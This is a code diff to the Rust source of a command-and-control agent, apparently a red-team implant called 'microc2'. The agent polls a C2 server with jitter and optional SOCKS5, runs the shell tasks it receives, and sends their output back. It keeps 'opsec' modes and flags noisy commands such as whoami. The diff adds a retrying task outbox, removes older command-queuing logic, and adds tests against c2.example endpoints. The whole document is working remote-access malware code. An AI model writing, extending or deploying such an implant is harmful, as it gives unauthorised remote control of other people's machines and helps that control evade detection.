+    // Typed v1 output fields are plain UTF-8 by contract. XOR decoding remains
+    // limited to the deprecated legacy /result route on the server.
+    match client.request(Method::POST, url).json(result).send().await {
+        Ok(response) => {
+            info!(
+                "[HTTP] Typed result POST response: {} (SOCKS5 enabled: {})",
+                response.status(),
+                config.socks5_enabled
+            );
+            let outcome = classify_submission_status(response.status(), "typed result");
+            if matches!(outcome, SubmissionOutcome::Accepted) {
+                update_c2_failure_state(true);
+            } else {
+                error!(
+                    "[HTTP] Typed result submission failed with status: {}",
+                    response.status()
+                );
+                update_c2_failure_state(false);
+            }
+            outcome
+        }
+        Err(err) => {
+            error!("[HTTP] Typed result POST failed: {}", err);
+            update_c2_failure_state(false);
+            SubmissionOutcome::Retryable(err.to_string())
+        }
+    }
+}
+
+#[derive(Clone, Debug, Eq, PartialEq)]
+enum SubmissionOutcome {
+    Accepted,
+    Retryable(String),
+    Permanent(String),
+}
+
+fn classify_submission_status(status: StatusCode, operation: &str) -> SubmissionOutcome {
+    if status.is_success() {
+        return SubmissionOutcome::Accepted;
+    }
+    let message = format!("{operation} submission failed with status {status}");
+    if status == StatusCode::REQUEST_TIMEOUT
+        || status == StatusCode::TOO_MANY_REQUESTS
+        || status.is_server_error()
+    {
+        SubmissionOutcome::Retryable(message)
+    } else {
+        SubmissionOutcome::Permanent(message)
+    }
+}
+
+fn build_task_result(
+    task: &Task,
+    started_at: String,
+    completed_at: String,
+    execution: ShellExecution,
+) -> TaskResult {
+    let outcome = if execution.exit_code == Some(0) && execution.error.is_none() {
+        TaskOutcome::Completed
+    } else {
+        TaskOutcome::Failed
+    };
+
+    TaskResult {
+        schema_version: TASK_SCHEMA_VERSION,
+        task_id: task.id.clone(),
+        agent_id: task.agent_id.clone(),
+        outcome,
+        started_at,
+        completed_at,
+        exit_code: execution.exit_code,
+        output: TaskOutput {
+            stdout: execution.stdout,
+            stderr: execution.stderr,
+        },
+        error: bound_result_error(execution.error),
+    }
+}
+
+fn bound_result_error(error: Option<String>) -> Option<String> {
+    const MARKER: &str = "… [truncated]";
+
+    error.map(|error| {
+        if error.chars().count() <= MAX_RESULT_ERROR_CHARS {
+            return error;
+        }
+        let keep = MAX_RESULT_ERROR_CHARS.saturating_sub(MARKER.chars().count());
+        let mut bounded: String = error.chars().take(keep).collect();
+        bounded.push_str(MARKER);
+        bounded
+    })
+}
+
+trait TaskTransport {
+    async fn submit_running(&self, task: &Task, started_at: &str) -> SubmissionOutcome;
+    async fn submit_result(&self, result: &TaskResult) -> SubmissionOutcome;
+}
+
+struct HttpTaskTransport<'a> {
+    config: &'a AgentConfig,
+    server_addr: &'a str,
+    agent_id: &'a str,
+}
+
+impl TaskTransport for HttpTaskTransport<'_> {
+    async fn submit_running(&self, task: &Task, started_at: &str) -> SubmissionOutcome {
+        submit_running_status_with_client(
+            self.config,
+            self.server_addr,
+            self.agent_id,
+            task,
+            started_at,
+        )
+        .await
+    }
+
+    async fn submit_result(&self, result: &TaskResult) -> SubmissionOutcome {
+        submit_task_result_with_client(self.config, self.server_addr, self.agent_id, result).await
+    }
+}
+
+trait TaskExecutor {
+    async fn execute(&self, task: &Task) -> ShellExecution;
+}
+
+struct ShellTaskExecutor;
+
+impl TaskExecutor for ShellTaskExecutor {
+    async fn execute(&self, task: &Task) -> ShellExecution {
+        match &task.task_type {
+            TaskType::Shell => execute_shell(&task.arguments.command, task.timeout_seconds).await,
+        }
+    }
+}
+
+#[derive(Clone, Debug)]
+enum TaskDeliveryState {
+    AwaitingRunning {
+        task: Box<Task>,
+        started_at: String,
+    },
+    Executing,
+    AwaitingResult {
+        result: Box<TaskResult>,
+    },
+    BlockedResult {
+        result: Box<TaskResult>,
+        reason: String,
+    },
+    Delivered,
+    Blocked {
+        reason: String,
+    },
+}
+
+#[derive(Default)]
+struct TaskOutbox {
+    states: Mutex<HashMap<String, TaskDeliveryState>>,
+    terminal_order: Mutex<VecDeque<String>>,
+}
+
+impl TaskOutbox {
+    fn enqueue(&self, task: Task) -> bool {
+        self.enqueue_at(task, utc_timestamp())
+    }
+
+    fn enqueue_at(&self, task: Task, started_at: String) -> bool {
+        let mut states = self.lock_states();
+        if states.contains_key(&task.id) {
+            return false;
+        }
+        states.insert(
+            task.id.clone(),
+            TaskDeliveryState::AwaitingRunning {
+                task: Box::new(task),
+                started_at,
+            },
+        );
+        true
+    }
+
+    fn has_pending(&self) -> bool {
+        self.lock_states().values().any(|state| {
+            matches!(
+                state,
+                TaskDeliveryState::AwaitingRunning { .. }
+                    | TaskDeliveryState::Executing
+                    | TaskDeliveryState::AwaitingResult { .. }
+                    | TaskDeliveryState::BlockedResult { .. }
+            )
+        })
+    }
+
+    async fn process_all<T, E>(&self, transport: &T, executor: &E)
+    where
+        T: TaskTransport,
+        E: TaskExecutor,
+    {
+        self.process_all_with_clock(transport, executor, Utc::now)
+            .await;
+    }
+
+    async fn process_all_with_clock<T, E, C>(&self, transport: &T, executor: &E, now: C)
+    where
+        T: TaskTransport,
+        E: TaskExecutor,
+        C: Fn() -> DateTime<Utc> + Copy,
+    {
+        let task_ids: Vec<String> = self
+            .lock_states()
+            .iter()
+            .filter(|(_, state)| {
+                matches!(
+                    state,
+                    TaskDeliveryState::AwaitingRunning { .. }
+                        | TaskDeliveryState::AwaitingResult { .. }
+                )
+            })
+            .map(|(task_id, _)| task_id.clone())
+            .collect();
+        for task_id in task_ids {
+            self.process_one(&task_id, transport, executor, now).await;
+        }
+    }
+
+    async fn process_one<T, E, C>(&self, task_id: &str, transport: &T, executor: &E, now: C)
+    where
+        T: TaskTransport,
+        E: TaskExecutor,
+        C: Fn() -> DateTime<Utc> + Copy,
+    {
+        loop {
+            let Some(state) = self.lock_states().get(task_id).cloned() else {
+                return;
+            };
+            match state {
+                TaskDeliveryState::AwaitingRunning { task, started_at } => {
+                    if let Err(reason) = task_may_start_at(&task, now()) {
+                        warn!(
+                            "[TASK] Blocking task {} before acknowledgement: {}",
+                            task_id, reason
+                        );
+                        self.block(task_id, reason);
+                        return;
+                    }
+
+                    match transport.submit_running(&task, &started_at).await {
+                        SubmissionOutcome::Accepted => {
+                            if let Err(reason) = task_may_start_at(&task, now()) {
+                                warn!(
+                                    "[TASK] Task {} expired while awaiting running acknowledgement",
+                                    task_id
+                                );
+                                let result = build_task_result(
+                                    &task,
+                                    started_at,
+                                    now().to_rfc3339_opts(SecondsFormat::Millis, true),
+                                    ShellExecution::failed(reason),
+                                );
+                                self.set_awaiting_result(task_id, result);
+                                continue;
+                            }
+
+                            if !self.claim_execution(task_id) {
+                                return;
+                            }
+                            if is_strong_command(&task.arguments.command) {
+                                mark_noisy_command_executed();
+                            }
+                            let execution = executor.execute(&task).await;
+                            let result = build_task_result(
+                                &task,
+                                started_at,
+                                now().to_rfc3339_opts(SecondsFormat::Millis, true),
+                                execution,
+                            );
+                            self.set_awaiting_result(task_id, result);
+                        }
+                        SubmissionOutcome::Retryable(error) => {
+                            warn!(
+                                "[TASK] Running acknowledgement for {} will retry: {}",
+                                task_id, error
+                            );
+                            return;
+                        }
+                        SubmissionOutcome::Permanent(error) => {
+                            warn!(
+                                "[TASK] Blocking task {} after permanent running rejection: {}",
+                                task_id, error
+                            );
+                            self.block(task_id, error);
+                            return;
+                        }
+                    }
+                }
+                TaskDeliveryState::AwaitingResult { result } => {
+                    match transport.submit_result(&result).await {
+                        SubmissionOutcome::Accepted => {
+                            self.set_terminal(task_id, TaskDeliveryState::Delivered);
+                        }
+                        SubmissionOutcome::Retryable(error) => {
+                            warn!("[TASK] Result for {} will retry: {}", task_id, error);
+                        }
+                        SubmissionOutcome::Permanent(error) => {
+                            warn!(
+                                "[TASK] Blocking result delivery for {} after permanent rejection: {}",
+                                task_id, error
+                            );
+                            self.block_result(task_id, result, error);
+                        }
+                    }
+                    return;
+                }
+                TaskDeliveryState::Executing | TaskDeliveryState::Delivered => return,
+                TaskDeliveryState::BlockedResult { result, reason } => {
+                    debug!(
+                        "[TASK] Result delivery for {} remains blocked (payload for {} retained): {}",
+                        task_id, result.task_id, reason
+                    );
+                    return;
+                }
+                TaskDeliveryState::Blocked { reason } => {
+                    debug!("[TASK] Task {} remains blocked: {}", task_id, reason);
+                    return;
+                }
+            }
+        }
+    }
+
+    fn claim_execution(&self, task_id: &str) -> bool {
+        let mut states = self.lock_states();
+        if !matches!(
+            states.get(task_id),
+            Some(TaskDeliveryState::AwaitingRunning { .. })
+        ) {
+            return false;
+        }
+        states.insert(task_id.to_string(), TaskDeliveryState::Executing);
+        true
+    }
+
+    fn set_awaiting_result(&self, task_id: &str, result: TaskResult) {
+        let mut states = self.lock_states();
+        if matches!(
+            states.get(task_id),
+            Some(TaskDeliveryState::Executing | TaskDeliveryState::AwaitingRunning { .. })
+        ) {
+            states.insert(
+                task_id.to_string(),
+                TaskDeliveryState::AwaitingResult {
+                    result: Box::new(result),
+                },
+            );
+        }
+    }
+
+    fn set_terminal(&self, task_id: &str, state: TaskDeliveryState) {
+        let mut states = self.lock_states();
+        let was_terminal = matches!(
+            states.get(task_id),
+            Some(TaskDeliveryState::Delivered | TaskDeliveryState::Blocked { .. })
+        );
+        states.insert(task_id.to_string(), state);
+        drop(states);
+
+        if was_terminal {
+            return;
+        }
+        let mut terminal_order = self
+            .terminal_order
+            .lock()
+            .unwrap_or_else(std::sync::PoisonError::into_inner);
+        terminal_order.push_back(task_id.to_string());
+        while terminal_order.len() > MAX_TERMINAL_TASK_IDS {
+            if let Some(expired_id) = terminal_order.pop_front() {
+                let mut states = self.lock_states();
+                if matches!(
+                    states.get(&expired_id),
+                    Some(TaskDeliveryState::Delivered | TaskDeliveryState::Blocked { .. })
+                ) {
+                    states.remove(&expired_id);
+                }
+            }
+        }
+    }
+
+    fn block(&self, task_id: &str, reason: String) {
+        self.set_terminal(task_id, TaskDeliveryState::Blocked { reason });
+    }
+
+    fn block_result(&self, task_id: &str, result: Box<TaskResult>, reason: String) {
+        self.lock_states().insert(
+            task_id.to_string(),
+            TaskDeliveryState::BlockedResult { result, reason },
+        );
+    }
+
+    fn lock_states(&self) -> std::sync::MutexGuard<'_, HashMap<String, TaskDeliveryState>> {
+        self.states
+            .lock()
+            .unwrap_or_else(std::sync::PoisonError::into_inner)
+    }
+
+    #[cfg(test)]
+    fn state(&self, task_id: &str) -> Option<TaskDeliveryState> {
+        self.lock_states().get(task_id).cloned()
+    }
+}
+
+fn task_may_start_at(task: &Task, now: DateTime<Utc>) -> Result<(), String> {
+    let expires_at = task
+        .expires_at
+        .as_deref()
+        .ok_or_else(|| "task is missing required expires_at".to_string())?;
+    let expires_at = DateTime::parse_from_rfc3339(expires_at)
+        .map_err(|_| "expires_at is not a valid RFC3339 timestamp".to_string())?
+        .with_timezone(&Utc);
+    if now >= expires_at {
+        return Err(format!(
+            "task expired at {} before shell execution could start",
+            expires_at.to_rfc3339_opts(SecondsFormat::Millis, true)
+        ));
+    }
+    Ok(())
+}
+
+async fn process_task_outbox(config: &AgentConfig, server_addr: &str, agent_id: &str) {
+    let transport = HttpTaskTransport {
+        config,
+        server_addr,
+        agent_id,
+    };
+    TASK_OUTBOX
+        .process_all(&transport, &ShellTaskExecutor)
+        .await;
 }
 
 fn is_strong_command(cmd: &str) -> bool {
@@ -442,28 +1387,6 @@ fn starts_with_command_token(cmd: &str, token: &str) -> bool {
     match trimmed[token.len()..].chars().next() {
         Some(next) => next.is_whitespace(),
         None => true,
-    }
-}
-
-// Check if the command should be executed based on the current opsec mode
-// This function now only queues, execution logic is in agent_loop
-fn should_queue_command(cmd: &str) -> bool {
-    let mode = determine_agent_mode(&crate::config::AgentConfig::load().unwrap_or_default());
-    debug!("[OPSEC] should_queue_command: mode={:?}, cmd={}", mode, cmd);
-    match mode {
-        AgentMode::FullOpsec | AgentMode::ReducedActivity => {
-            info!("[OPSEC] Queueing command '{}' (mode: {:?})", cmd, mode);
-            true // Queue the command
-        }
-        AgentMode::BackgroundOpsec => {
-            if is_weak_command(cmd) {
-                info!("[OPSEC] Weak command '{}' allowed in BackgroundOpsec", cmd);
-                false // Execute immediately
-            } else {
-                info!("[OPSEC] Strong command '{}' queued in BackgroundOpsec", cmd);
-                true // Queue the command
-            }
-        }
     }
 }
 
@@ -502,128 +1425,39 @@ pub async fn agent_loop(
 
         // Still in BackgroundOpsec, proceed with C2 communication
         let sleep_time = random_jitter(config.sleep_interval, config.jitter);
-        info!("[SHELL] Polling for commands (Interval: {}s)", sleep_time);
+        info!("[SHELL] Polling for tasks (Interval: {}s)", sleep_time);
 
-        match get_command_with_client(&config, server_addr, agent_id).await {
-            Ok(Some(command)) => {
-                info!("[SHELL] Received command: {}", command);
+        // Resolve an uncertain running/result delivery before accepting more
+        // work. The in-memory outbox keeps the original timestamp and result
+        // payload intact across retries.
+        process_task_outbox(&config, server_addr, agent_id).await;
 
-                // Check if we should queue this command or execute immediately
-                if should_queue_command(&command) {
-                    // Queue the command
-                    let mut queue_guard = QUEUED_COMMANDS.lock().unwrap();
-                    queue_guard.push(command.clone());
+        if TASK_OUTBOX.has_pending() {
+            debug!("[SHELL] Pending task delivery remains; deferring the next task poll");
+        } else {
+            match get_task_with_client(&config, server_addr, agent_id).await {
+                Ok(Some(task)) => {
                     info!(
-                        "[OPSEC] Command '{}' queued (total queued: {})",
-                        command,
-                        queue_guard.len()
+                        "[SHELL] Received task {} (type: {:?})",
+                        task.id, task.task_type
                     );
-                } else {
-                    // Execute immediately (only weak commands in BackgroundOpsec)
-                    info!("[SHELL] Executing weak command immediately: {}", command);
-                    let cmd_parts: Vec<&str> = command.split_whitespace().collect();
-                    match execute_command(&cmd_parts).await {
-                        Ok(output) => {
-                            info!("[SHELL] Command executed successfully");
-                            if let Err(e) = submit_result_with_client(
-                                &config,
-                                server_addr,
-                                agent_id,
-                                &command,
-                                &output,
-                            )
-                            .await
-                            {
-                                error!("[SHELL] Failed to submit result: {}", e);
-                            }
-                        }
-                        Err(e) => {
-                            error!("[SHELL] Command execution failed: {}", e);
-                            let error_output = format!("Error: {}", e);
-                            if let Err(e) = submit_result_with_client(
-                                &config,
-                                server_addr,
-                                agent_id,
-                                &command,
-                                &error_output,
-                            )
-                            .await
-                            {
-                                error!("[SHELL] Failed to submit error result: {}", e);
-                            }
-                        }
+                    let task_id = task.id.clone();
+                    if TASK_OUTBOX.enqueue(task) {
+                        info!("[SHELL] Task {} added to the delivery outbox", task_id);
+                    } else {
+                        debug!("[SHELL] Ignoring duplicate delivery for task {}", task_id);
                     }
+                    process_task_outbox(&config, server_addr, agent_id).await;
                 }
-            }
-            Ok(None) => {
-                // No command available, continue polling
-                debug!("[SHELL] No command available");
-            }
-            Err(e) => {
-                error!("[SHELL] Failed to get command: {}", e);
-                // Continue loop, C2 failure state already updated
-            }
-        }
-
-        // --- Process Queued Commands ---
-        // Always check and process queue while in BackgroundOpsec
-        let mut commands_to_run = Vec::new();
-        {
-            let mut queue_guard = QUEUED_COMMANDS.lock().unwrap();
-            commands_to_run.extend(queue_guard.drain(..));
-        } // Lock released
-
-        if !commands_to_run.is_empty() {
-            info!(
-                "[SHELL] Processing {} queued commands",
-                commands_to_run.len()
-            );
-            for command in commands_to_run {
-                info!("[SHELL] Executing queued command: {}", command);
-                let cmd_parts: Vec<&str> = command.split_whitespace().collect();
-
-                //  Mark noisy command execution with timestamp
-                if is_strong_command(&command) {
-                    mark_noisy_command_executed(); //  Use timestamp instead of Instant
+                Ok(None) => {
+                    debug!("[SHELL] No task available");
                 }
-
-                match execute_command(&cmd_parts).await {
-                    Ok(output) => {
-                        info!("[SHELL] Queued command executed successfully");
-                        if let Err(e) = submit_result_with_client(
-                            &config,
-                            server_addr,
-                            agent_id,
-                            &command,
-                            &output,
-                        )
-                        .await
-                        {
-                            error!("[SHELL] Failed to submit queued command result: {}", e);
-                        }
-                    }
-                    Err(e) => {
-                        error!("[SHELL] Queued command execution failed: {}", e);
-                        let error_output = format!("Error: {}", e);
-                        if let Err(e) = submit_result_with_client(
-                            &config,
-                            server_addr,
-                            agent_id,
-                            &command,
-                            &error_output,
-                        )
-                        .await
-                        {
-                            error!(
-                                "[SHELL] Failed to submit queued command error result: {}",
-                                e
-                            );
-                        }
-                    }
+                Err(err) => {
+                    error!("[SHELL] Failed to get task: {}", err);
+                    // Continue loop, C2 failure state already updated
                 }
             }
         }
-        // --- End Process Queued Commands ---
 
         // Sleep before next poll
         debug!("[SHELL] Sleeping for {} seconds...", sleep_time);
@@ -670,18 +1504,42 @@ async fn stop_pivot_server(port: u16) -> Result<String, String> {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use std::sync::atomic::{AtomicUsize, Ordering};
 
     #[test]
     fn builds_c2_endpoint_urls_from_validated_base() -> io::Result<()> {
-        let url = build_c2_endpoint_url(
+        let heartbeat_url = build_c2_endpoint_url(
             "https://c2.example/base/",
-            "agent/one",
+            "agent.one:1",
             C2Endpoint::Heartbeat,
         )?;
-
         assert_eq!(
-            url.as_str(),
-            "https://c2.example/base/api/agent/agent%2Fone/heartbeat"
+            heartbeat_url.as_str(),
+            "https://c2.example/base/api/agent/agent.one:1/heartbeat"
+        );
+
+        let tasks_url =
+            build_c2_endpoint_url("https://c2.example", "agent-one", C2Endpoint::Tasks)?;
+        assert_eq!(
+            tasks_url.as_str(),
+            "https://c2.example/api/agent/agent-one/tasks"
+        );
+
+        let status_url = build_c2_endpoint_url(
+            "https://c2.example",
+            "agent-one",
+            C2Endpoint::TaskStatus("task_one-1"),
+        )?;
+        assert_eq!(
+            status_url.as_str(),
+            "https://c2.example/api/agent/agent-one/tasks/task_one-1/status"
+        );
+
+        let results_url =
+            build_c2_endpoint_url("https://c2.example", "agent-one", C2Endpoint::Results)?;
+        assert_eq!(
+            results_url.as_str(),
+            "https://c2.example/api/agent/agent-one/results"
         );
 
         Ok(())
@@ -689,7 +1547,7 @@ mod tests {
 
     #[test]
     fn rejects_invalid_c2_endpoint_bases() {
-        let err = match build_c2_endpoint_url("file:///tmp/c2", "agent-one", C2Endpoint::Command) {
+        let err = match build_c2_endpoint_url("file:///tmp/c2", "agent-one", C2Endpoint::Tasks) {
             Ok(url) => panic!("unexpected valid C2 URL: {}", url),
             Err(err) => err,
         };
@@ -698,16 +1556,416 @@ mod tests {
     }
 
     #[test]
-    fn classifies_commands_on_token_boundaries() {
-        assert!(is_weak_command("ping 127.0.0.1"));
-        assert!(is_weak_command("  echo hello"));
-        assert!(!is_weak_command("pinger"));
-        assert!(!is_weak_command("echoed"));
+    fn rejects_invalid_c2_endpoint_identifiers() {
+        let invalid_agent =
+            build_c2_endpoint_url("https://c2.example", "agent/one", C2Endpoint::Tasks)
+                .expect_err("slash is outside the identifier contract");
+        assert_eq!(invalid_agent.kind(), io::ErrorKind::InvalidInput);
 
+        let invalid_task = build_c2_endpoint_url(
+            "https://c2.example",
+            "agent-one",
+            C2Endpoint::TaskStatus("task/one"),
+        )
+        .expect_err("slash is outside the identifier contract");
+        assert_eq!(invalid_task.kind(), io::ErrorKind::InvalidInput);
+    }
+
+    #[test]
+    fn classifies_noisy_commands_on_token_boundaries() {
         assert!(is_strong_command("download report.txt"));
         assert!(is_strong_command("whoami"));
         assert!(!is_strong_command("downloaded"));
         assert!(!is_strong_command("echo hello"));
+    }
+
+    #[test]
+    fn typed_result_preserves_correlation_and_plain_output_fields() {
+        let task = sample_task("echo hello");
+        let completed = build_task_result(
+            &task,
+            "2026-07-23T16:30:05Z".to_string(),
+            "2026-07-23T16:30:06Z".to_string(),
+            ShellExecution {
+                stdout: "hello\n".to_string(),
+                stderr: String::new(),
+                exit_code: Some(0),
+                error: None,
+            },
+        );
+        assert_eq!(completed.task_id, "task-one");
+        assert_eq!(completed.agent_id, "agent-one");
+        assert_eq!(completed.outcome, TaskOutcome::Completed);
+        assert_eq!(completed.output.stdout, "hello\n");
+        assert_eq!(completed.output.stderr, "");
+        assert_eq!(completed.exit_code, Some(0));
+        assert_eq!(completed.error, None);
+
+        let failed = build_task_result(
+            &task,
+            "2026-07-23T16:30:05Z".to_string(),
+            "2026-07-23T16:30:06Z".to_string(),
+            ShellExecution {
+                stdout: String::new(),
+                stderr: "permission denied\n".to_string(),
+                exit_code: Some(1),
+                error: Some("command exited with status 1".to_string()),
+            },
+        );
+        assert_eq!(failed.outcome, TaskOutcome::Failed);
+        assert_eq!(failed.output.stderr, "permission denied\n");
+        assert_eq!(failed.exit_code, Some(1));
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn shell_execution_separates_stdout_stderr_and_exit_code() {
+        use std::fs;
+        use std::os::unix::fs::PermissionsExt;
+        use std::time::{SystemTime, UNIX_EPOCH};
+
+        let nonce = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .expect("system clock")
+            .as_nanos();
+        let script_path = env::temp_dir().join(format!(
+            "microc2-task-test-{}-{nonce}.sh",
+            std::process::id()
+        ));
+        fs::write(
+            &script_path,
+            "#!/bin/sh\nprintf 'standard output'\nprintf 'standard error' >&2\nexit 7\n",
+        )
+        .expect("write test script");
+        fs::set_permissions(&script_path, fs::Permissions::from_mode(0o700))
+            .expect("make test script executable");
+
+        let execution = execute_shell(script_path.to_str().expect("UTF-8 temporary path"), 5).await;
+        let _ = fs::remove_file(script_path);
+
+        assert_eq!(execution.stdout, "standard output");
+        assert_eq!(execution.stderr, "standard error");
+        assert_eq!(execution.exit_code, Some(7));
+        assert_eq!(
+            execution.error.as_deref(),
+            Some("command exited with status 7")
+        );
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn shell_execution_enforces_task_timeout() {
+        let started = Instant::now();
+        let execution = execute_shell("sleep 5", 1).await;
+
+        assert!(
+            started.elapsed() < Duration::from_secs(3),
+            "timed-out task did not terminate promptly"
+        );
+        assert_eq!(execution.exit_code, None);
+        assert!(
+            execution
+                .error
+                .as_deref()
+                .is_some_and(|error| error.contains("timed out after 1 seconds")),
+            "unexpected timeout result: {execution:?}"
+        );
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn repeated_shell_timeouts_return_promptly_for_detached_reaping() {
+        for _ in 0..3 {
+            let started = Instant::now();
+            let execution = execute_shell("sleep 5", 1).await;
+            assert!(started.elapsed() < Duration::from_secs(3));
+            assert!(execution
+                .error
+                .as_deref()
+                .is_some_and(|error| error.contains("timed out")));
+        }
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn shell_execution_deadline_includes_background_descendant_output_handles() {
+        let started = Instant::now();
+        let execution = execute_shell("sleep 5 &", 1).await;
+
+        assert!(
+            started.elapsed() < Duration::from_secs(3),
+            "background descendant kept output readers alive past the deadline"
+        );
+        assert_eq!(execution.exit_code, None);
+        assert!(
+            execution
+                .error
+                .as_deref()
+                .is_some_and(|error| error.contains("timed out after 1 seconds")),
+            "unexpected timeout result: {execution:?}"
+        );
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn successful_shell_exit_cleans_redirected_background_descendants() {
+        use std::time::{SystemTime, UNIX_EPOCH};
+
+        let nonce = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .expect("system clock")
+            .as_nanos();
+        let marker = env::temp_dir().join(format!(
+            "microc2-background-marker-{}-{nonce}",
+            std::process::id()
+        ));
+        let command = format!("(sleep 1; touch '{}') >/dev/null 2>&1 &", marker.display());
+
+        let execution = execute_shell(&command, 5).await;
+        assert_eq!(execution.exit_code, Some(0));
+        assert_eq!(execution.error, None);
+        tokio::time::sleep(Duration::from_millis(1_500)).await;
+        assert!(
+            !marker.exists(),
+            "redirected background descendant survived successful shell exit"
+        );
+        let _ = std::fs::remove_file(marker);
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn shell_execution_caps_and_reports_high_volume_output() {
+        let execution = execute_shell(
+            "{ yes o | head -c 1100000; yes e | head -c 1100000 >&2; }",
+            5,
+        )
+        .await;
+
+        assert_eq!(execution.stdout.len(), MAX_CAPTURE_BYTES);
+        assert_eq!(execution.stderr.len(), MAX_CAPTURE_BYTES);
+        assert_eq!(execution.exit_code, Some(0));
+        let error = execution.error.as_deref().expect("truncation error");
+        assert!(error.contains("stdout truncated at 1048576 bytes"));
+        assert!(error.contains("stderr truncated at 1048576 bytes"));
+    }
+
+    #[cfg(windows)]
+    #[tokio::test]
+    async fn windows_shell_execution_terminates_the_process_tree_at_timeout() {
+        let started = Instant::now();
+        let execution = execute_shell(
+            "start \"\" /B cmd /C \"ping -n 6 127.0.0.1 >NUL\" & ping -n 6 127.0.0.1 >NUL",
+            1,
+        )
+        .await;
+
+        assert!(
+            started.elapsed() < Duration::from_secs(3),
+            "Windows process tree termination exceeded its bound"
+        );
+        assert_eq!(execution.exit_code, None);
+        assert!(
+            execution
+                .error
+                .as_deref()
+                .is_some_and(|error| error.contains("timed out after 1 seconds")),
+            "unexpected timeout result: {execution:?}"
+        );
+    }
+
+    #[test]
+    fn result_error_is_bounded_without_changing_wire_fields() {
+        let result = build_task_result(
+            &sample_task("echo hello"),
+            "2026-07-23T16:30:05Z".to_string(),
+            "2026-07-23T16:30:06Z".to_string(),
+            ShellExecution::failed("é".repeat(MAX_RESULT_ERROR_CHARS + 10)),
+        );
+
+        let error = result.error.expect("failed result error");
+        assert_eq!(error.chars().count(), MAX_RESULT_ERROR_CHARS);
+        assert!(error.ends_with("… [truncated]"));
+    }
+
+    #[test]
+    fn submission_statuses_distinguish_retryable_and_permanent_failures() {
+        assert!(matches!(
+            classify_submission_status(StatusCode::REQUEST_TIMEOUT, "result"),
+            SubmissionOutcome::Retryable(_)
+        ));
+        assert!(matches!(
+            classify_submission_status(StatusCode::TOO_MANY_REQUESTS, "result"),
+            SubmissionOutcome::Retryable(_)
+        ));
+        assert!(matches!(
+            classify_submission_status(StatusCode::BAD_GATEWAY, "result"),
+            SubmissionOutcome::Retryable(_)
+        ));
+        assert!(matches!(
+            classify_submission_status(StatusCode::CONFLICT, "result"),
+            SubmissionOutcome::Permanent(_)
+        ));
+    }
+
+    #[tokio::test]
+    async fn running_acknowledgement_retry_preserves_timestamp_and_executes_once() {
+        let outbox = TaskOutbox::default();
+        let task = sample_task("echo hello");
+        let started_at = "2026-07-23T16:30:01.234Z".to_string();
+        assert!(outbox.enqueue_at(task.clone(), started_at.clone()));
+
+        let transport = MockTransport::new(
+            [
+                SubmissionOutcome::Retryable("status response lost".to_string()),
+                SubmissionOutcome::Accepted,
+            ],
+            [SubmissionOutcome::Accepted],
+        );
+        let executor = CountingExecutor::successful("hello\n");
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+        assert_eq!(executor.executions(), 0);
+        assert!(matches!(
+            outbox.state(&task.id),
+            Some(TaskDeliveryState::AwaitingRunning { .. })
+        ));
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+        assert_eq!(executor.executions(), 1);
+        assert!(matches!(
+            outbox.state(&task.id),
+            Some(TaskDeliveryState::Delivered)
+        ));
+
+        let running_attempts = transport.running_attempts();
+        assert_eq!(running_attempts.len(), 2);
+        assert_eq!(running_attempts[0], running_attempts[1]);
+        assert_eq!(running_attempts[0].1, started_at);
+    }
+
+    #[tokio::test]
+    async fn ambiguous_result_retry_reuses_payload_and_never_reruns_task() {
+        let outbox = TaskOutbox::default();
+        let task = sample_task("echo hello");
+        assert!(outbox.enqueue_at(task.clone(), "2026-07-23T16:30:01.234Z".to_string()));
+        let transport = MockTransport::new(
+            [SubmissionOutcome::Accepted],
+            [
+                SubmissionOutcome::Retryable("result response lost".to_string()),
+                SubmissionOutcome::Accepted,
+            ],
+        );
+        let executor = CountingExecutor::successful("hello\n");
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+        assert_eq!(executor.executions(), 1);
+        assert!(matches!(
+            outbox.state(&task.id),
+            Some(TaskDeliveryState::AwaitingResult { .. })
+        ));
+        assert!(
+            !outbox.enqueue_at(task.clone(), "2026-07-23T16:30:02.000Z".to_string()),
+            "lease redelivery must be deduplicated while result delivery is uncertain"
+        );
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+        assert_eq!(executor.executions(), 1);
+        assert!(matches!(
+            outbox.state(&task.id),
+            Some(TaskDeliveryState::Delivered)
+        ));
+
+        let result_attempts = transport.result_attempts();
+        assert_eq!(result_attempts.len(), 2);
+        assert_eq!(result_attempts[0], result_attempts[1]);
+        assert!(
+            !outbox.enqueue_at(task, "2026-07-23T16:30:03.000Z".to_string()),
+            "recent delivered task IDs must remain deduplicated"
+        );
+    }
+
+    #[tokio::test]
+    async fn permanent_result_rejection_retains_payload_and_applies_backpressure() {
+        let outbox = TaskOutbox::default();
+        let task = sample_task("echo hello");
+        assert!(outbox.enqueue_at(task.clone(), "2026-07-23T16:30:01.234Z".to_string()));
+        let transport = MockTransport::new(
+            [SubmissionOutcome::Accepted],
+            [SubmissionOutcome::Permanent(
+                "result submission failed with status 409 Conflict".to_string(),
+            )],
+        );
+        let executor = CountingExecutor::successful("hello\n");
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+
+        assert_eq!(executor.executions(), 1);
+        assert!(outbox.has_pending());
+        let attempted_result = transport
+            .result_attempts()
+            .into_iter()
+            .next()
+            .expect("result submission");
+        match outbox.state(&task.id) {
+            Some(TaskDeliveryState::BlockedResult { result, reason }) => {
+                assert_eq!(*result, attempted_result);
+                assert!(reason.contains("409 Conflict"));
+            }
+            state => panic!("unexpected outbox state: {state:?}"),
+        }
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+        assert_eq!(executor.executions(), 1);
+        assert_eq!(transport.result_attempts().len(), 1);
+    }
+
+    #[test]
+    fn terminal_task_dedupe_retention_is_bounded() {
+        let outbox = TaskOutbox::default();
